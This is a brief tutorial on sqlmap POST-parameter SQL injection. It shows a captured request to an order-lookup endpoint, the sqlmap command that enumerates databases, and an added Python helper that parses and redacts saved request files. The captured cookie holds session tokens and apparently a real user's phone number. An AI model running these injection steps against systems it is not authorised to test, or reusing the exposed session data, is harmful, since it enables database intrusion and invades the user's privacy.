1. Capture the request with a packet capture tool, save it to a file, and load that file into sqlmap.
POST /sme/Static/orderfind/orderintfaceph HTTP/1.1
Host: abc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: mallcity=11|110; wt_fpc=id=22959b9c257db67a1ce1453356218801:lv=1454489261422:ss=1454489261387; _N3FA_CID=12B169EF230442C4C7CE6D01CECFA2FA; _n3fa_ext=ft=1453356220; _n3fa_lvt_a9e72dfe4a54a20c3d6e671b3bad01d9=1453356220,1454489259,1454502730; _ga=ga1.2.101776521.1453356221; hm_lvt_9208c8c641bfb0560ce7884c36938d9d=1453356221,1454489262; tempbycitycode=11; piw=%7b%22login_name%22%3a%22186****5736%22%2c%22nickname%22%3a%22%e5%91%a8%e5%bb%b6%e5%b9%b3%22%2c%22rme%22%3a%7b%22ac%22%3a%22%22%2c%22at%22%3a%22%22%2c%22pt%22%3a%2201%22%2c%22u%22%3a%2218631645736%22%7d%2c%22verifystate%22%3a%22%22%7d; bigipserverpool_mall_sme_web_80=454625802.20480.0000; _n3fa_lpvt_a9e72dfe4a54a20c3d6e671b3bad01d9=1454502730; jsessionid=v9tjwx1bxlq2jkxkylfrhp0gyy1fnxmvxvgjcggg4y291zcthxqm!1297467854; bigipserverpool_mall_sme_app_8001=1008276490.16671.0000
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 105

orderid=null&timel=%e6%89%80%e6%9c%89%e6%97%b6%e9%97%b4&pageno=1&provinceselect=%e5%8c%97%e4%ba%ac&type=1
sqlmap.py -r post.txt --dbs
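Added example, not part of the original page: a Python check of a saved request file of the kind loaded with -r. It lists the form parameters in the body, flags a malformed request line or a Content-Length mismatch, and masks session headers before the file is attached to a report. The sample request (host, path, cookie value) is constructed, and the function names are hypothetical.

```python
from urllib.parse import parse_qsl

# Constructed sample in the shape of post.txt; host, path and cookie are placeholders.
SAMPLE_BODY = "orderid=null&pageno=1&provinceselect=%e5%8c%97%e4%ba%ac&type=1"
SAMPLE_REQUEST = (
    "POST /orders/find HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "Cookie: JSESSIONID=constructed-session-value\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(SAMPLE_BODY)}\r\n"
    "\r\n" + SAMPLE_BODY
)
SENSITIVE = {"cookie", "authorization"}  # header names masked by redact()

def parse_request(raw: str) -> dict:
    """Split a saved raw HTTP request into request line, headers and form parameters."""
    head, sep, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split()
    problems = [] if len(parts) == 3 else ["malformed request line"]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if not sep:
        problems.append("no blank line between headers and body")
    if "host" not in headers:
        problems.append("missing Host header")
    declared, actual = headers.get("content-length", ""), len(body.encode("utf-8"))
    if declared.isdigit() and int(declared) != actual:
        problems.append(f"Content-Length {declared} != body length {actual}")
    params = []
    if headers.get("content-type", "").lower().startswith("application/x-www-form-urlencoded"):
        params = parse_qsl(body, keep_blank_values=True)
    return {"method": parts[0] if parts else None, "headers": headers,
            "params": params, "problems": problems}

def redact(raw: str) -> str:
    """Mask session-bearing header values before the file goes into a report."""
    out, in_headers = [], True
    for line in raw.replace("\r\n", "\n").split("\n"):
        if line == "":
            in_headers = False  # blank line ends the header section
        name = line.partition(":")[0]
        if in_headers and name.strip().lower() in SENSITIVE:
            line = f"{name}: [REDACTED]"
        out.append(line)
    return "\n".join(out)

if __name__ == "__main__":
    print(parse_request(SAMPLE_REQUEST)["params"], redact(SAMPLE_REQUEST), sep="\n")
```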
sqlmap POST injection: two ways